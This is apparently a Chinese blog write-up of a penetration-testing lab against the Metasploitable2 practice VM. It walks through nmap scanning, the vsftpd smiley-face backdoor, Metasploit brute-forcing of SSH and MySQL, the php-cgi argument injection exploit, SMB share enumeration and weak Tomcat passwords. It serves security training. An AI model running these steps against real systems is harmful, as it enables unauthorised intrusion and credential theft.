记一次Metasploitable2渗透测试

文章介绍了如何使用KaliLinux上的Nmap进行端口扫描,然后针对开放的端口,如FTP、SSH、HTTP、SMB等,利用Metasploit进行漏洞分析和暴力破解。通过21端口的FTP笑脸后门,22和23端口的SSH暴力破解,80端口的CGI参数注入,139和445端口的SMB服务扫描,以及3306端口的MySQL数据库暴力破解,展示了渗透测试的过程并成功获取权限。
摘要由CSDN通过智能技术生成

Merasploitable2下载地址Metasploitable download | SourceForge.net

环境准备

Kali:192.168.224.129

靶机:192.168.224.135

信息收集

打开kali  使用nmap扫描工具对靶机进行扫描

Nmap -sV 192.168.224.135

可以发现TCP端口21 22 23等都有开放

脆弱性分析

首先21端口ftp服务版本号是2.3.4,首先想到的就是笑脸后门

其次是22、23号端口,可以使用msf暴力破解来获取账号密码

80端口为apache的2.2.8 for linux,可以参考往年的CVE来进行测试

139与445端口为smb共享服务,可以尝试msfsmb模块进行测试

1524端口在以前的一篇文章中看到过介绍,可能存在后门

3306端口为mysql数据库端口,可以直接进行爆破

8180端口看介绍反馈为apache tomcat,可以试着弱口令测试tomcat的账号密码

剩余的可以使用msf进行搜索服务

测试

首先是21端口,我们使用ftp连接一下看可以得到什么反馈

反馈很好,进行测试,输入root:)看是否成功

密码随便输

Successful

22端口:暴力破解ssh

打开msfconsole,

Search ssh_login搜索模块

Use auxilary/scanner/ssh/ssh_login 使用模块

Set rhost 192.168.224.135 设置目标地址

Set user_file /root/1.txt 设置用户字典路径

Set pass_file /root/2.txt 设置密码字典路径

Set threads 100 设置线程

Options 查看设置

Run 开始跑

账号密码出来了

23端口telnet 刚才已经跑出来了账号密码

直接连接输入账号密码

Telnet 192.168.224.135

登录成功!

80端口

先访问一下此靶机的80端口的/phpinfo.php看一下

参阅往年cve发现了一个2012年的漏洞,server API是CGI方式运行的,这个方式在php存在漏洞-Cgi参数注入

打开msf

搜一下php-cgi

使用模板multi/http/php_cgi_arg_injection

修改一下目标ip set rhosts 192.168.224.135

查看一下配置 options

Exploit 开跑

 

Successful!

 

139和445端口为smb共享服务,可以在msf里搜索一下smb相关的模块进行测试

使用模块scanner/smb/smb_enumshares

Use scanner/smb/smb_enumshares

设置ip set rhost 192.168.224.135

成功

3306mysql数据库

首先想到的就是msf中mysql暴力破解登录的模板

直接调用测试

Search mysql_login

Use 0

Options 查看一下需要哪些参数

Set rhosts 192.168.224.135 设置ip

Set username root 设置mysql数据库登录账号

Exploit 跑一下

 

成功

8180端口tmocat

尝试了一下弱口令

Tomcat tomcat

既然登录成功了

目前只发现了这么几个.......

  • 0
    点赞
  • 1
    收藏
    觉得还不错? 一键收藏
  • 打赏
    打赏
  • 1
    评论
评论 1
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包

打赏作者

小粉、

你的鼓励将是我创作的最大动力

¥1 ¥2 ¥4 ¥6 ¥10 ¥20
扫码支付:¥1
获取中
扫码支付

您的余额不足,请更换扫码支付或充值

打赏作者

实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值